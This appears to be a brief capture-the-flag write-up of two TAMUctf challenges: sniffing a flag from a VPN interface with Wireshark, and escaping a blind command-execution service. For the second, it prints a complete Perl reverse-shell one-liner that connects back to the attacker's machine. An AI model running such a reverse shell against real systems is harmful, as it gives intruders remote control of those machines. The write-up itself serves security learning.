Network/Pentest
Easy
Listen
Just listen
This challenge was pretty straightforward. We are given a ovpn file and connect to their network. After that I opened up wireshark to listen on the tun0 interface and eventually got a packet which contained the flag.
Misc
Easy
Blind
nc challenges.tamuctf.com 3424
Execute: whoami
0
Execute: ls
0
Execute: ip addr
127
At this point it seems like were just getting the return value as 127 is the unix standard error number for “command not found” so we need to find a command which will let us reverse shell. After trying python, python3, python2, nc, and netcat, I tried perl which just hung instead of sending an error message, so it was waiting for more input. I exited the shell and sent this in a new session
perl -e 'use Socket;$i="my_ip";$p=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec(
"/bin/sh -i");};
I popped a reverse shell and ran cat flag.txt to get gigem{r3v3r53_5h3ll5}